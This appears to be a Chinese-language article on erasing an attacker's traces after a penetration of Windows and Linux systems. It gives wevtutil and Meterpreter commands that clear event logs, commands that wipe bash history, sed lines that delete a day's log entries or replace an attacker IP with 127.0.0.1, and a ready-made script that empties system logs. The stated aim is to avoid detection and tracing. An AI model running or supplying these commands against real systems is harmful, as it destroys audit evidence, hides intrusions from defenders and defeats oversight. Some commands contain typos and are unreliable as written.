后滲透階段清理痕跡方式總結(jié)

一、前言

在滲透完成之后，為了減少被發(fā)現(xiàn)和追溯的概率，攻擊者有必要清除自己的攻擊痕跡，本文分別對(duì)windows和linux上清理痕跡的方式做一個(gè)總結(jié)。

二、windows

有遠(yuǎn)程桌面權(quán)限時(shí)手動(dòng)刪除日志：

1	開(kāi)始-程序-管理工具-計(jì)算機(jī)管理-系統(tǒng)工具-事件查看器-清除日志

wevtutil：

1 2 3 4

wevtutil el 列出系統(tǒng)中所有日志名稱(chēng) wevtutil cl system 清理系統(tǒng)日志 wevtutil cl application 清理應(yīng)用程序日志 wevtutil cl security 清理安全日志

meterperter自帶清除日志功能：

1	clearev 清除windows中的應(yīng)用程序日志、系統(tǒng)日志、安全日志

清除recent：

在文件資源管理器中點(diǎn)擊“查看”->“選項(xiàng)”->在常規(guī)->隱私中點(diǎn)擊”清除”按鈕

或直接打開(kāi)C:\Users\Administrator\Recent并刪除所有內(nèi)容

或在命令行中輸入del /f /s /q “%userprofile%\Recent*.*

三、linux

清除命令歷史記錄

1 2 3 4

histroy -r #刪除當(dāng)前會(huì)話(huà)歷史記錄 history -c #刪除內(nèi)存中的所有命令歷史 rm .bash_history #刪除歷史文件中的內(nèi)容 HISTZISE=0 #通過(guò)設(shè)置歷史命令條數(shù)來(lái)清除所有歷史記錄

在隱蔽的位置執(zhí)行命令

使用vim打開(kāi)文件執(zhí)行命令

1 2	:set history=0 :!command

linux日志文件

1 2 3 4 5 6 7 8 9 10 11

/var/run/utmp 記錄現(xiàn)在登入的用戶(hù) /var/log/wtmp 記錄用戶(hù)所有的登入和登出 /var/log/lastlog 記錄每一個(gè)用戶(hù)最后登入時(shí)間 /var/log/btmp 記錄錯(cuò)誤的登入嘗試 /var/log/auth.log 需要身份確認(rèn)的操作 /var/log/secure 記錄安全相關(guān)的日志信息 /var/log/maillog 記錄郵件相關(guān)的日志信息 /var/log/message 記錄系統(tǒng)啟動(dòng)后的信息和錯(cuò)誤日志 /var/log/cron 記錄定時(shí)任務(wù)相關(guān)的日志信息 /var/log/spooler 記錄UUCP和news設(shè)備相關(guān)的日志信息 /var/log/boot.log 記錄守護(hù)進(jìn)程啟動(dòng)和停止相關(guān)的日志消息

完全刪除日志文件：

1 2 3 4 5

cat /dev/null > filename : > filename > filename echo "" > filename echo > filename

針對(duì)性刪除日志文件：

1 2	刪除當(dāng)天日志 sed -i '/當(dāng)天日期/'d filename

篡改日志文件：

1 2	將所有170.170.64.17ip替換為127.0.0.1 sed -i 's/170.170.64.17/127.0.0.1/g'

一鍵清除腳本：

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

#!/usr/bin/bash echo > /var/log/syslog echo > /var/log/messages echo > /var/log/httpd/access_log echo > /var/log/httpd/error_log echo > /var/log/xferlog echo > /var/log/secure echo > /var/log/auth.log echo > /var/log/user.log echo > /var/log/wtmp echo > /var/log/lastlog echo > /var/log/btmp echo > /var/run/utmp rm ~/./bash_history history -c